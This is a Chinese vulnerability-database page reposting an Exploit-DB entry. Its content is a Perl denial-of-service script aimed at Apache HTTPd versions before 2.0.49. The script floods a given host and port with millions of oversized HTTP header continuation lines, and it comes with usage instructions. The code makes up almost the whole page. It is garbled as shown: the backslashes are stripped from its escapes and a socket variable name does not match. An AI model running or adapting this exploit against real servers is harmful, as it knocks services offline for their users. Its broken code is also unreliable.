Apache 2.0.49 – Arbitrary Long HTTP Headers Denial of Service

Apache 2.0.49 – Arbitrary Long HTTP Headers Denial of Service

漏洞ID 1055174 漏洞类型
发布时间 2005-06-20 更新时间 2005-06-20
图片[1]-Apache 2.0.49 – Arbitrary Long HTTP Headers Denial of Service-安全小百科CVE编号 N/A
图片[2]-Apache 2.0.49 – Arbitrary Long HTTP Headers Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1056
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#/usr/bin/perl -w

use IO::Socket::INET;

usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);

sub usage
{
print "n***********************************************";
print "n Apache HTTPd Arbitrary Long HTTP Headers DoS n";
print " Tested Versions : 2 < 2.0.49 n";
print " Adv : http://www.guninski.com/httpd1.html n";
print " By  : Qnix ,  Q-nix[at]hotmail[dot]com n";
print "***********************************************nn";
print "Usage: apache_ap_get_dos.pl [Host] [Port]nn";
exit(1);
}

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.n";

binmode($sock);

$hostname="Host: $host";

$buf2='A'x50;
$buf4='A'x8183;

$len=length($buf2);

$buf="GET / HTTP/1.1rn";

send($sock,$buf,0) || die "send error:$@n";
for($i= 0; $i < 2000000; $i++)
{
   $buf=" $buf4rn";
   send($sock,$buf,0) || die "send error:$@, target maybe have been
DoS?n";
}

$buf="$hostnamern";
$buf.="Content-Length: $lenrn";

$buf.="rn";
$buf.=$buf2."rnrn";

send($sock,$buf,0) || die "send error:$@n";
print "Ok, the buffer sent to the target n";
close($sock);

# milw0rm.com [2005-06-20]

相关推荐: PAFaq Administrator Username SQL Injection Vulnerability

PAFaq Administrator Username SQL Injection Vulnerability 漏洞ID 1096455 漏洞类型 Input Validation Error 发布时间 2005-06-20 更新时间 2005-06-20 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享